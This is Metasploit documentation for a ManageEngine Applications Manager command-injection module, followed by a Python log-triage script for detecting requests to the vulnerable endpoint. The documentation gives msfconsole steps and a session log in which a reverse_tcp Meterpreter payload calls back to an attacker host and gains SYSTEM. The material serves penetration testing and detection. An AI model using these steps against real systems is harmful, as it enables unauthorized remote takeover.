documentation/modules/exploit/windows/http/manageengine_appmanager_exec.md
This module exploits a command injection vulnerability in the ManageEngine Applications Manager product. An unauthenticated user can execute an operating system command in the context of a privileged user. The publicly accessible testCredential.do endpoint takes multiple user inputs and validates the supplied credentials by accessing the given system. This endpoint calls several internal classes and then executes a PowerShell script without validating a user-supplied parameter when the given system is OfficeSharePointServer.
Vulnerable Application Installation Steps
Go to the following website and download the Windows version of the product. It comes with built-in Java and PostgreSQL, so you don't need to install anything else. http://archives.manageengine.com/applications_manager/13630/
A successful check of the exploit will look like this:
1. Start msfconsole
2. use exploit/windows/http/manageengine_appmanager_exec
3. set RHOST <RHOST>
4. set PAYLOAD windows/meterpreter/reverse_tcp
5. set LHOST <LHOST>
6. check
7. Verify that "The target is vulnerable." appears in console.
8. exploit
9. Verify that "Triggering the vulnerability" appears in console.
10. Verify that "Sending stage to <TARGET>" appears in console.
msf > use exploit/windows/http/manageengine_appmanager_exec
msf exploit(windows/http/manageengine_appmanager_exec) > set RHOST 12.0.0.192
RHOST => 12.0.0.192
msf exploit(windows/http/manageengine_appmanager_exec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(windows/http/manageengine_appmanager_exec) > set LHOST 12.0.0.1
LHOST => 12.0.0.1
msf exploit(windows/http/manageengine_appmanager_exec) > check
[+] 12.0.0.192:9090 The target is vulnerable.
msf exploit(windows/http/manageengine_appmanager_exec) > run
[*] Started reverse TCP handler on 12.0.0.1:4444
[*] Triggering the vulnerability
[*] Sending stage (179779 bytes) to 12.0.0.192
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
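
For defenders, one way to hunt for requests that reached the testCredential.do endpoint described above is to triage the web access log. This is an added example, not part of the module or its documentation; the combined-style log layout, the sample lines, the placeholder query parameter `x` and the `triage` function name are assumptions.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed sample access-log lines (combined-style layout is an assumption;
# the query parameter name "x" is a placeholder, not a real product parameter).
SAMPLE_LOG = """\
198.51.100.7 - - [12/Mar/2018:10:01:02 +0000] "GET /index.do HTTP/1.1" 200 5120
198.51.100.7 - - [12/Mar/2018:10:01:05 +0000] "POST /testCredential.do HTTP/1.1" 200 312
203.0.113.9 - - [12/Mar/2018:10:02:11 +0000] "GET /TestCredential.do?x=Office%53harePointServer HTTP/1.1" 200 298
203.0.113.9 - - [12/Mar/2018:10:02:40 +0000] "GET /images/testCredential.do.png HTTP/1.1" 404 0
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
ENDPOINT = "/testcredential.do"          # endpoint named on this page, lower-cased
MONITOR_TYPE = "officesharepointserver"  # system type named on this page, lower-cased


def triage(log_text):
    """Return one record per request that reached the testCredential.do endpoint."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a request line in the assumed layout
        client, when, method, target, status = m.groups()
        parts = urlsplit(target)
        # Decode percent-escapes and drop ";jsessionid=..." style path parameters
        # so encoded or decorated forms of the path still match.
        path = unquote(parts.path).split(";")[0].lower()
        if not path.endswith(ENDPOINT):
            continue
        # Access logs rarely record POST bodies, so a bare hit is only "review";
        # the monitor type visible in the query string raises it to "high".
        level = "high" if MONITOR_TYPE in unquote(parts.query).lower() else "review"
        hits.append({"client": client, "time": when, "method": method,
                     "status": int(status), "level": level})
    return hits


if __name__ == "__main__":
    for hit in triage(SAMPLE_LOG):
        print(hit)
```

Because the endpoint is reachable without authentication, any hit from a client that is not an administrator workstation is worth correlating with PowerShell process creation on the Applications Manager host at the same time.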